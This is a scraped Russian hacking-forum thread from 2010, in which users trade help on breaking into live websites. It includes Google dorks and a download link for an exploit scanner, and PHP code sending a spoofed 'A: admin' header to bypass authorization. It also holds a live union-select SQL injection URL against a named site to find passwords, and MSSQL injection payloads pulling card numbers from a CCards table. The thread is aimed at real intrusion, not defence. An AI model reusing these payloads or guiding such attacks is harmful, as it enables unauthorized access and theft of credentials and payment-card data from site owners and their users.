ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12551  
Старый 14.04.2010, 23:05
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от jecka3000  
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=

и т.д.
http://slil.ru/28959824
пасс: antichat
 
Ответить с цитированием

  #12552  
Старый 14.04.2010, 23:06
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Redwood
скинь сюда название, полное
 
Ответить с цитированием

  #12553  
Старый 14.04.2010, 23:09
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от jecka3000  
Redwood
скинь сюда название, полное
SQLi/XSS/LFI/RFI Exploit Scanner
 
Ответить с цитированием

  #12554  
Старый 14.04.2010, 23:12
Аватар для Zilt0
Zilt0
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038

Репутация: 10
Отправить сообщение для Zilt0 с помощью ICQ
По умолчанию

Цитата:
Сообщение от попугай  
послать заголовок A=admin

решено,
спасибо огромное!!!

Последний раз редактировалось Zilt0; 14.04.2010 в 23:14..
 
Ответить с цитированием

  #12555  
Старый 14.04.2010, 23:14
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Просто "A"
 
Ответить с цитированием

  #12556  
Старый 14.04.2010, 23:14
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Zilt0  
с помощью Acunetix Web Vulnerability - Http editor, добавляю заголовок HTTP_A, но авторизация не проходит,
может я не то делаю?

надо не HTTP_A, а A.


вот на php пример
PHP код:
echo get('www.entropy.ch''/software/MacOSX/php/test.php''http://google.com/''firefox''');
function 
get($hostname$path$ref$ua$cook)
{
    
$line="";
    
$fp=fsockopen($hostname80$errno$errstr60);
    
        if(!
$fp) echo $errstr($errno);
            else
            {
                
$headers "GET $path HTTP/1.1\r\n";
                
$headers .="Host: $hostname\r\n";
                
$headers .="User-Agent: $ua\r\n";
                
$headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
                
$headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
                
$headers .="Cookie: $cook\r\n";
                
$headers .="A: admin\r\n";
                
$headers .="Connection: Close\r\n";
                
$headers .="Referer: $ref\r\n\r\n";
                
                
fwrite($fp$headers);
                

                    while(!
feof($fp)){
                            
                        
$line .= fgets($fp1024);
                    }
                
                
fclose($fp);
            }

    return 
$line;

 
Ответить с цитированием

  #12557  
Старый 14.04.2010, 23:14
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
Версия: 4
 
Ответить с цитированием

  #12558  
Старый 14.04.2010, 23:33
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

Цитата:
Сообщение от попугай  
нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
 
Ответить с цитированием

  #12559  
Старый 15.04.2010, 02:01
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

эмм...
вот такая проблема
MS SQL /Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

когда делаю вот такой запрос:
1'+or+1=(select+top+1+CardNumber+from+CCards)--
и в ответ



Цитата:
Типы данных text, ntext и image недействительны в этом подопросе или в этом выражении агрегата.

hex,aes_encrypt(aes_.. не идут


Original
Цитата:
Microsoft OLE DB Provider for ODBC Drivers- Fehler '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Die Datentypen text, ntext und image sind in dieser Unterabfrage oder in diesem Aggregatausdruck ungültig.

/inc/session.inc, line 25


остольные columns все идут..

Последний раз редактировалось [Feldmarschall]; 23.04.2010 в 18:43..
 
Ответить с цитированием

  #12560  
Старый 15.04.2010, 12:57
Аватар для budden
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

[Feldmarschall]
В MSSQL: and(1)=convert(int,@@version)--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ